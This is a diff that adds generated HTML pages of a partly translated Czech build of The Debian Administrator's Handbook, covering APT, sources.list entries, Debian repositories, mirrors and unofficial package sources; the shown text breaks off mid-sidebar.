+                  class="filename">md2</code> and integrate its components <code
+                  class="filename">sda6</code> and <code
+                  class="filename">sdc6</code> into the bulk VG (which grows by 200 GB instead of 100 GB); the <code
+                  class="filename">lv_rushes</code> logical volume can then be grown according to requirements.
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-services.html"><strong>Předcházející</strong>11.8. Real-Time Communication Services</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtualization.html"><strong>Další</strong>12.2. Virtualization</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/apt.html b/tmp/cs-CZ/html/apt.html
new file mode 100644
index 000000000..24539bd3d
--- /dev/null
+++ b/tmp/cs-CZ/html/apt.html
@@ -0,0 +1,746 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 6. Maintenance and Updates: The APT Tools</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.coexistence-with-other-packaging-systems.html"
+        title="5.5. Coexistence with Other Packaging Systems" /><link
+        rel="next"
+        href="sect.apt-get.html"
+        title="6.2. aptitude, apt-get, and apt Commands" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/apt.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-get.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="apt"></a>Kapitola 6. Maintenance and Updates: The APT Tools</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="apt.html#sect.apt-sources.list">6.1. Filling in the <code
+                    class="filename">sources.list</code> File</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.6">6.1.1. Syntax</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.7">6.1.2. Repositories for <span
+                        class="distribution distribution">Stable</span> Users</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.8">6.1.3. Repositories for <span
+                        class="distribution distribution">Testing</span>/<span
+                        class="distribution distribution">Unstable</span> Users</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.9">6.1.4. Using Alternate Mirrors</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.10">6.1.5. Non-Official Resources: <code
+                        class="literal">mentors.debian.net</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.11">6.1.6. Caching Proxy for Debian Packages</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.apt-get.html">6.2. <code
+                    class="command">aptitude</code>, <code
+                    class="command">apt-get</code>, and <code
+                    class="command">apt</code> Commands</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#id-1.9.11.8">6.2.1. Initialization</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#id-1.9.11.9">6.2.2. Installing and Removing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt-upgrade">6.2.3. System Upgrade</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt-config">6.2.4. Configuration Options</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt.priorities">6.2.5. Managing Package Priorities</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt-mix-distros">6.2.6. Working with Several Distributions</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.automatic-tracking">6.2.7. Tracking Automatically Installed Packages</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.apt-cache.html">6.3. The <code
+                    class="command">apt-cache</code> Command</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.apt-frontends.html">6.4. Frontends: <code
+                    class="command">aptitude</code>, <code
+                    class="command">synaptic</code></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.apt-frontends.html#sect.aptitude">6.4.1. <code
+                        class="command">aptitude</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-frontends.html#id-1.9.13.7">6.4.2. <code
+                        class="command">synaptic</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.package-authentication.html">6.5. Checking Package Authenticity</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.dist-upgrade.html">6.6. Upgrading from One Stable Distribution to the Next</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.dist-upgrade.html#id-1.9.15.3">6.6.1. Recommended Procedure</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dist-upgrade.html#id-1.9.15.4">6.6.2. Handling Problems after an Upgrade</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.regular-upgrades.html">6.7. Keeping a System Up to Date</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.automatic-upgrades.html">6.8. Automatic Upgrades</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.5">6.8.1. Configuring <code
+                        class="command">dpkg</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.6">6.8.2. Configuring APT</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.7">6.8.3. Configuring <code
+                        class="command">debconf</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.8">6.8.4. Handling Command Line Interactions</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.9">6.8.5. The Miracle Combination</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.searching-packages.html">6.9. Searching for Packages</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		What makes Debian so popular with administrators is how easily software can be installed and how easily the whole system can be updated. This unique advantage is largely due to the <span
+              class="emphasis"><em>APT</em></span> program, that Falcot Corp administrators studied with enthusiasm.
+	</div></div><div
+          class="para">
+		<a
+            id="id-1.9.4.1"
+            class="indexterm"></a> <a
+            id="id-1.9.4.2"
+            class="indexterm"></a> APT is the abbreviation for Advanced Package Tool. What makes this program “advanced” is its approach to packages. It doesn't simply evaluate them individually, but it considers them as a whole and produces the best possible combination of packages depending on what is available and compatible (according to dependencies).
+	</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Package source and source package</strong></p></div></div></div><div
+            class="para">
+		The word <span
+              class="emphasis"><em>source</em></span> can be ambiguous. A source package — a package containing the source code of a program — should not be confused with a package source — a repository (website, FTP server, CD-ROM, local directory, etc.) which contains packages.
+	</div></div><div
+          class="para">
+		APT needs to be given a “list of package sources”: the file <code
+            class="filename">/etc/apt/sources.list</code> will list the different repositories (or “sources”) that publish Debian packages. APT will then import the list of packages published by each of these sources. This operation is achieved by downloading <code
+            class="filename">Packages.xz</code> or a variant using a different compression method (such as <code
+            class="filename">Packages.gz</code> or <code
+            class="filename">.bz2</code>) files (in case of a source of binary packages) and <code
+            class="filename">Sources.xz</code> or a variant (in case of a source of source packages) and by analyzing their contents. When an old copy of these files is already present, APT can update it by only downloading the differences (see sidebar <a
+            class="xref"
+            href="sect.apt-get.html#sidebar.apt-pdiff"><span
+              class="emphasis"><em>TIP</em></span> Incremental upgrade</a>).
+	</div><a
+          id="id-1.9.7"
+          class="indexterm"></a><a
+          id="id-1.9.8"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> <code
+                      class="command">gzip</code>, <code
+                      class="command">bzip2</code>, <code
+                      class="command">LZMA</code> and <code
+                      class="command">XZ</code> Compression</strong></p></div></div></div><a
+            id="id-1.9.9.2"
+            class="indexterm"></a><a
+            id="id-1.9.9.3"
+            class="indexterm"></a><a
+            id="id-1.9.9.4"
+            class="indexterm"></a><a
+            id="id-1.9.9.5"
+            class="indexterm"></a><div
+            class="para">
+		A <code
+              class="filename">.gz</code> extension refers to a file compressed with the <code
+              class="command">gzip</code> utility. <code
+              class="command">gzip</code> is the fast and efficient traditional Unix utility to compress files. Newer tools achieve better rates of compression but require more resources (computation time and memory) to compress and uncompress a file. Among them, and by order of appearance, there are <code
+              class="command">bzip2</code> (generating files with a <code
+              class="filename">.bz2</code> extension), <code
+              class="command">lzma</code> (generating <code
+              class="filename">.lzma</code> files) and <code
+              class="command">xz</code> (generating <code
+              class="filename">.xz</code> files).
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-sources.list"></a>6.1. Filling in the <code
+                    class="filename">sources.list</code> File</h2></div></div></div><a
+            id="id-1.9.10.2"
+            class="indexterm"></a><a
+            id="id-1.9.10.3"
+            class="indexterm"></a><a
+            id="id-1.9.10.4"
+            class="indexterm"></a><a
+            id="id-1.9.10.5"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.6"></a>6.1.1. Syntax</h3></div></div></div><div
+              class="para">
+				Each active line of the <code
+                class="filename">/etc/apt/sources.list</code> file contains the description of a source, made of 3 parts separated by spaces.
+			</div><div
+              class="para">
+				The first field indicates the source type:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						“<code
+                      class="literal">deb</code>” for binary packages,
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						“<code
+                      class="literal">deb-src</code>” for source packages.
+					</div></li></ul></div><div
+              class="para">
+				The second field gives the base URL of the source (combined with the filenames present in the <code
+                class="filename">Packages.xz</code> files, it must give a full and valid URL): this can consist in a Debian mirror or in any other package archive set up by a third party. The URL can start with <code
+                class="literal">file://</code> to indicate a local source installed in the system's file hierarchy, with <code
+                class="literal">http://</code> to indicate a source accessible from a web server, or with <code
+                class="literal">ftp://</code> for a source available on an FTP server. The URL can also start with <code
+                class="literal">cdrom:</code> for CD-ROM/DVD-ROM/Blu-ray disc based installations, although this is less frequent, since network-based installation methods are more and more common.
+			</div><div
+              class="para">
+				The syntax of the last field depends on the structure of the repository. In the simplest cases, you can simply indicate a subdirectory (with a required trailing slash) of the desired source (this is often a simple “<code
+                class="filename">./</code>” which refers to the absence of a subdirectory — the packages are then directly at the specified URL). But in the most common case, the repositories will be structured like a Debian mirror, with multiple distributions each having multiple components. In those cases, name the chosen distribution (by its “codename” — see the list in sidebar <a
+                class="xref"
+                href="sect.foundation-documents.html#sidebar.bruce-perens"><span
+                  class="emphasis"><em>KOMUNITA</em></span> Bruce Perens, kontroverzní vůdce</a> — or by the corresponding “suites” — <code
+                class="literal">stable</code>, <code
+                class="literal">testing</code>, <code
+                class="literal">unstable</code>), then the components (or sections) to enable (chosen between <code
+                class="literal">main</code>, <code
+                class="literal">contrib</code>, and <code
+                class="literal">non-free</code> in a typical Debian mirror).
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.sections"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> The <code
+                          class="literal">main</code>, <code
+                          class="literal">contrib</code> and <code
+                          class="literal">non-free</code> archives</strong></p></div></div></div><a
+                id="id-1.9.10.6.7.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.4"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.5"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.6"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.7"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.8"
+                class="indexterm"></a><div
+                class="para">
+				Debian uses three sections to differentiate packages according to the licenses chosen by the authors of each work. <code
+                  class="literal">Main</code> gathers all packages which fully comply with the Debian Free Software Guidelines.
+			</div><div
+                class="para">
+				The <code
+                  class="literal">non-free</code> archive is different because it contains software which does not (entirely) conform to these principles but which can nevertheless be distributed without restrictions. This archive, which is not officially part of Debian, is a service for users who could need some of those programs — however Debian always recommends giving priority to free software. The existence of this section represents a considerable problem for Richard M. Stallman and keeps the Free Software Foundation from recommending Debian to users.
+			</div><div
+                class="para">
+				<code
+                  class="literal">Contrib</code> (contributions) is a set of open source software which cannot function without some non-free elements. These elements can be software from the <code
+                  class="literal">non-free</code> section, or non-free files such as game ROMs, BIOS of consoles, etc. <code
+                  class="literal">Contrib</code> also includes free software whose compilation requires proprietary elements. This was initially the case for the OpenOffice.org office suite, which used to require a proprietary Java environment.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> <code
+                          class="filename">/etc/apt/sources.list.d/*.list</code> files</strong></p></div></div></div><div
+                class="para">
+				If many package sources are referenced, it can be useful to split them in multiple files. Each part is then stored in <code
+                  class="filename">/etc/apt/sources.list.d/<em
+                    class="replaceable">filename</em>.list</code> (see sidebar <a
+                  class="xref"
+                  href="sect.apt-get.html#sidebar.directory.d"><span
+                    class="emphasis"><em>BACK TO BASICS</em></span> Directories ending in <code
+                    class="filename">.d</code></a>).
+			</div></div><a
+              id="id-1.9.10.6.9"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="literal">cdrom</code> entries describe the CD/DVD-ROMs you have. Contrary to other entries, a CD-ROM is not always available since it has to be inserted into the drive and since only one disc can be read at a time. For those reasons, these sources are managed in a slightly different way, and need to be added with the <code
+                class="command">apt-cdrom</code> program, usually executed with the <code
+                class="literal">add</code> parameter. The latter will then request the disc to be inserted in the drive and will browse its contents looking for <code
+                class="filename">Packages</code> files. It will use these files to update its database of available packages (this operation is usually done by the <code
+                class="command">apt update</code> command). From then on, APT can require the disc to be inserted if it needs one of its packages.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.7"></a>6.1.2. Repositories for <span
+                      class="distribution distribution">Stable</span> Users</h3></div></div></div><div
+              class="para">
+				Here is a standard <code
+                class="filename">sources.list</code> for a system running the <span
+                class="distribution distribution">Stable</span> version of Debian:
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="example.stable-sources-list"></a><p
+                class="title"><strong>Příklad 6.1. <code
+                    class="filename">/etc/apt/sources.list</code> file for users of Debian Stable</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting"># Security updates
+deb http://security.debian.org/ stretch/updates main contrib non-free
+deb-src http://security.debian.org/ stretch/updates main contrib non-free
+
+## Debian mirror
+
+# Base repository
+deb http://deb.debian.org/debian stretch main contrib non-free
+deb-src http://deb.debian.org/debian stretch main contrib non-free
+
+# Stable updates
+deb http://deb.debian.org/debian stretch-updates main contrib non-free
+deb-src http://deb.debian.org/debian stretch-updates main contrib non-free
+
+# Stable backports
+deb http://deb.debian.org/debian stretch-backports main contrib non-free
+deb-src http://deb.debian.org/debian stretch-backports main contrib non-free
+</pre></div></div><div
+              class="para">
+				This file lists all sources of packages associated with the <span
+                class="distribution distribution">Stretch</span> version of Debian (the current <span
+                class="distribution distribution">Stable</span> as of this writing). We opted to name “stretch” explicitly instead of using the corresponding “stable“ alias (<code
+                class="literal">stable</code>, <code
+                class="literal">stable-updates</code>, <code
+                class="literal">stable-backports</code>) because we don't want to have the underlying distribution changed outside of our control when the next stable release comes out.
+			</div><div
+              class="para">
+				Most packages will come from the “base repository” which contains all packages but is seldom updated (about once every 2 months for a “point release”). The other repositories are partial (they do not contain all packages) and can host updates (packages with newer version) that APT might install. The following sections will explain the purpose and the rules governing each of those repositories.
+			</div><div
+              class="para">
+				Note that when the desired version of a package is available on several repositories, the first one listed in the <code
+                class="filename">sources.list</code> file will be used. For this reason, non-official sources are usually added at the end of the file.
+			</div><div
+              class="para">
+				As a side note, most of what this section says about <span
+                class="distribution distribution">Stable</span> applies equally well to <span
+                class="distribution distribution">Oldstable</span> since the latter is just an older <span
+                class="distribution distribution">Stable</span> that is maintained in parallel.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.security-updates"></a>6.1.2.1. Security Updates</h4></div></div></div><a
+                id="id-1.9.10.7.8.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.8.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.8.4"
+                class="indexterm"></a><div
+                class="para">
+					The security updates are not hosted on the usual network of Debian mirrors but on <code
+                  class="literal">security.debian.org</code> (on a small set of machines maintained by the <a
+                  class="link"
+                  href="sect.debian-internals.html#dsa-team">Debian System Administrators</a>). This archive contains security updates (prepared by the Debian Security Team and/or by package maintainers) for the <span
+                  class="distribution distribution">Stable</span> distribution.
+				</div><div
+                class="para">
+					The server can also host security updates for <span
+                  class="distribution distribution">Testing</span> but this doesn't happen very often since those updates tend to reach <span
+                  class="distribution distribution">Testing</span> via the regular flow of updates coming from <span
+                  class="distribution distribution">Unstable</span>.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.stable-updates"></a>6.1.2.2. Stable Updates</h4></div></div></div><a
+                id="id-1.9.10.7.9.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.9.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.9.4"
+                class="indexterm"></a><div
+                class="para">
+					Stable updates are not security sensitive but are deemed important enough to be pushed to users before the next stable point release.
+				</div><div
+                class="para">
+					This repository will typically contain fixes for critical bugs which could not be fixed before release or which have been introduced by subsequent updates. Depending on the urgency, it can also contain updates for packages that have to evolve over time… like <span
+                  class="pkg pkg">spamassassin</span>'s spam detection rules, <span
+                  class="pkg pkg">clamav</span>'s virus database, or the daylight-saving time rules of all timezones (<span
+                  class="pkg pkg">tzdata</span>).
+				</div><div
+                class="para">
+					In practice, this repository is a subset of the <code
+                  class="literal">proposed-updates</code> repository, carefully selected by the Stable Release Managers.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.proposed-updates"></a>6.1.2.3. Proposed Updates</h4></div></div></div><a
+                id="id-1.9.10.7.10.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.10.3"
+                class="indexterm"></a><div
+                class="para">
+					Once published, the <span
+                  class="distribution distribution">Stable</span> distribution is only updated about once every 2 months. The <code
+                  class="literal">proposed-updates</code> repository is where the expected updates are prepared (under the supervision of the Stable Release Managers).
+				</div><div
+                class="para">
+					The security and stable updates documented in the former sections are always included in this repository, but there is more too, because package maintainers also have the opportunity to fix important bugs that do not deserve an immediate release.
+				</div><div
+                class="para">
+					Anyone can use this repository to test those updates before their official publication. The extract below uses the <code
+                  class="literal">stretch-proposed-updates</code> alias which is both more explicit and more consistent since <code
+                  class="literal">jessie-proposed-updates</code> also exists (for the <span
+                  class="distribution distribution">Oldstable</span> updates):
+				</div><pre
+                class="programlisting">deb http://ftp.debian.org/debian stretch-proposed-updates main contrib non-free
+</pre></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.backports"></a>6.1.2.4. Stable Backports</h4></div></div></div><a
+                id="id-1.9.10.7.11.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.11.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.11.4"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">stable-backports</code> repository hosts “package backports”. The term refers to a package of some recent software which has been recompiled for an older distribution, generally for <span
+                  class="distribution distribution">Stable</span>.
+				</div><div
+                class="para">
+					When the distribution becomes a little dated, numerous software projects have released new versions that are not integrated into the current <span
+                  class="distribution distribution">Stable</span> (which is only modified to address the most critical problems, such as security problems). Since the <span
+                  class="distribution distribution">Testing</span> and <span
+                  class="distribution distribution">Unstable</span> distributions can be more risky, package maintainers sometimes offer recompilations of recent software applications for <span
+                  class="distribution distribution">Stable</span>, which has the advantage to limit potential instability to a small number of chosen packages. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://backports.debian.org">http://backports.debian.org</a></div>
+				</div><a
+                id="id-1.9.10.7.11.7"
+                class="indexterm"></a><div
+                class="para">
+					Backports from <code
+                  class="literal">stable-backports</code> are always created from packages available in <span
+                  class="distribution distribution">Testing</span>. This ensures that all installed backports will be upgradable to the corresponding stable version once the next stable release of Debian is available.
+				</div><div
+                class="para">
+					Even though this repository provides newer versions of packages, APT will not install them unless you give explicit instructions to do so (or unless you have already done so with a former version of the given backport):
+				</div><pre
+                class="screen"><code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>sudo apt-get install <em
+                      class="replaceable">package</em>/stretch-backports
+</code></strong><code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>sudo apt-get install -t stretch-backports <em
+                      class="replaceable">package</em>
+</code></strong></pre></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.8"></a>6.1.3. Repositories for <span
+                      class="distribution distribution">Testing</span>/<span
+                      class="distribution distribution">Unstable</span> Users</h3></div></div></div><div
+              class="para">
+				Here is a standard <code
+                class="filename">sources.list</code> for a system running the <span
+                class="distribution distribution">Testing</span> or <span
+                class="distribution distribution">Unstable</span> version of Debian:
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="example.testing-sources-list"></a><p
+                class="title"><strong>Příklad 6.2. <code
+                    class="filename">/etc/apt/sources.list</code> file for users of Debian <span
+                    class="distribution distribution">Testing</span>/<span
+                    class="distribution distribution">Unstable</span></strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Unstable
+deb http://deb.debian.org/debian unstable main contrib non-free
+deb-src http://deb.debian.org/debian unstable main contrib non-free
+
+# Testing
+deb http://deb.debian.org/debian testing main contrib non-free
+deb-src http://deb.debian.org/debian testing main contrib non-free
+
+# Stable
+deb http://deb.debian.org/debian stable main contrib non-free
+deb-src http://deb.debian.org/debian stable main contrib non-free
+
+# Security updates
+deb http://security.debian.org/ stable/updates main contrib non-free
+deb http://security.debian.org/ testing/updates main contrib non-free
+deb-src http://security.debian.org/ stable/updates main contrib non-free
+deb-src http://security.debian.org/ testing/updates main contrib non-free
+</pre></div></div><div
+              class="para">
+				With this <code
+                class="filename">sources.list</code> file APT will install packages from <span
+                class="distribution distribution">Unstable</span>. If that is not desired, use the <code
+                class="literal">APT::Default-Release</code> setting (see <a
+                class="xref"
+                href="sect.apt-get.html#sect.apt-upgrade">6.2.3 – „System Upgrade“</a>) to instruct APT to pick packages from another distribution (most likely <span
+                class="distribution distribution">Testing</span> in this case).
+			</div><div
+              class="para">
+				There are good reasons to include all those repositories, even though a single one should be enough. <span
+                class="distribution distribution">Testing</span> users will appreciate the possibility to cherry-pick a fixed package from <span
+                class="distribution distribution">Unstable</span> when the version in <span
+                class="distribution distribution">Testing</span> is affected by an annoying bug. On the opposite, <span
+                class="distribution distribution">Unstable</span> users bitten by unexpected regressions have the possibility to downgrade packages to their (supposedly working) <span
+                class="distribution distribution">Testing</span> version.
+			</div><div
+              class="para">
+				The inclusion of <span
+                class="distribution distribution">Stable</span> is more debatable but it often gives access to some packages which have been removed from the development versions. It also ensures that you get the latest updates for packages which have not been modified since the last stable release.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.9.10.8.7"></a>6.1.3.1. The <span
+                        class="distribution distribution">Experimental</span> Repository</h4></div></div></div><a
+                id="id-1.9.10.8.7.2"
+                class="indexterm"></a><div
+                class="para">
+					The archive of <span
+                  class="distribution distribution">Experimental</span> packages is present on all Debian mirrors, and contains packages which are not in the <span
+                  class="distribution distribution">Unstable</span> version yet because of their substandard quality — they are often software development versions or pre-versions (alpha, beta, release candidate…). A package can also be sent there after undergoing subsequent changes which can generate problems. The maintainer then tries to uncover them with help from advanced users who can handle important issues. After this first stage, the package is moved into <span
+                  class="distribution distribution">Unstable</span>, where it reaches a much larger audience and where it will be tested in much more detail.
+				</div><div
+                class="para">
+					<span
+                  class="distribution distribution">Experimental</span> is generally used by users who do not mind breaking their system and then repairing it. This distribution gives the possibility to import a package which a user wants to try or use as the need arises. That is exactly how Debian approaches it, since adding it in APT's <code
+                  class="filename">sources.list</code> file does not lead to the systematic use of its packages. The line to be added is:
+				</div><div
+                class="informalexample"><pre
+                  class="programlisting">deb http://deb.debian.org/debian experimental main contrib non-free
+</pre></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.9"></a>6.1.4. Using Alternate Mirrors</h3></div></div></div><a
+              id="id-1.9.10.9.2"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="filename">sources.list</code> examples in this chapter refer to package repositories hosted on <code
+                class="literal">deb.debian.og</code>. Those URLs will redirect you to servers which are close to you and which are managed by Content Delivery Networks (<acronym
+                class="acronym">CDN</acronym>) whose main role is to store multiple copies of the files across the world to deliver them as fast as possible to users. The CDN companies that Debian is working with are Debian partners who are offering their services freely to Debian. While none of those servers are under direct control of Debian, the fact that the whole archive is sealed by GPG signatures makes it a non-issue.
+			</div><a
+              id="id-1.9.10.9.4"
+              class="indexterm"></a><a
+              id="id-1.9.10.9.5"
+              class="indexterm"></a><div
+              class="para">
+				Picky users who are not satisfied with the performance of <code
+                class="literal">deb.debian.org</code> can try to find a better mirror in the official mirror list: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/mirror/list">https://www.debian.org/mirror/list</a></div>
+			</div><div
+              class="para">
+				But when you don't know which mirror is best for you, this list is of not much use. Fortunately for you, Debian maintains DNS entries of the form <code
+                class="literal">ftp.<em
+                  class="replaceable">country-code</em>.debian.org</code> (e.g. <code
+                class="literal">ftp.us.debian.org</code> for the USA, <code
+                class="literal">ftp.fr.debian.org</code> for France, etc.) which are covering many countries and which are pointing to one (or more) of the best mirrors available within that country.
+			</div><a
+              id="id-1.9.10.9.8"
+              class="indexterm"></a><div
+              class="para">
+				As an alternative to <code
+                class="literal">deb.debian.org</code>, there used to be <code
+                class="literal">httpredir.debian.org</code>. This service would identify a mirror close to you (among the list of official mirrors, using GeoIP mainly) and would redirect APT's requests to that mirror. This service has been deprecated due to reliability concerns and now <code
+                class="literal">httpredir.debian.org</code> provides the same CDN-based service as <code
+                class="literal">deb.debian.org</code>.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.10"></a>6.1.5. Non-Official Resources: <code
+                      class="literal">mentors.debian.net</code></h3></div></div></div><a
+              id="id-1.9.10.10.2"
+              class="indexterm"></a><div
+              class="para">
+				There are numerous non-official sources of Debian packages set up by advanced users who have recompiled some software (Ubuntu made this popular with their Personal Package Archive service), by programmers who make their creation available to all, and even by Debian developers who offer pre-versions of their package online.
+			</div><div
+              class="para">
+				The <code
+                class="literal">mentors.debian.net</code> site is interesting (although it only provides source packages), since it gathers packages created by candidates to the status of official Debian developer or by volunteers who wish to create Debian packages without going through that process of integration. These packages are made available without any guarantee regarding their quality; make sure that you check their origin and integrity and then test them before you consider using them in production.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>COMMUNITY</em></span> The <code
+                          class="literal">debian.net</code> sites</strong></p></div></div></div><a
+                id="id-1.9.10.10.5.2"
+                class="indexterm"></a><div
+                class="para">
+				The <span
